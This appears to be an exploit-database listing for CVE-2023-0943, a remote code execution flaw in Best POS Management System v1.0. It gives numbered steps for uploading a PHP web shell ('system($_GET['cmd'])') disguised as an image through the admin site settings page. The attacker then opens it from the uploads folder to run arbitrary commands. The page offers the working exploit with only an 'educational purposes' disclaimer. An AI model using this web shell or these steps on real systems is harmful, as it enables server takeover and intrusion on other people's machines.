Best pos management system v1.0 remote code execution (rce) on file upload Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2023-04-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Best pos management system v1.0 remote code execution (rce) on file upload is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows 11
# CVE : (CVE-2023-0943)
### Steps to Reproduce
1- Login as Admin Rule
2- Head to " http://localhost/kruxton/index.php?page=site_settings"
3- Try to Upload an image here it will be a shell.php
<?php system($_GET['cmd']); ?>
4- Head to http://localhost/kruxton/assets/uploads/
5- Access your uploaded Shell
Best pos management system v1.0 remote code execution (rce) on file upload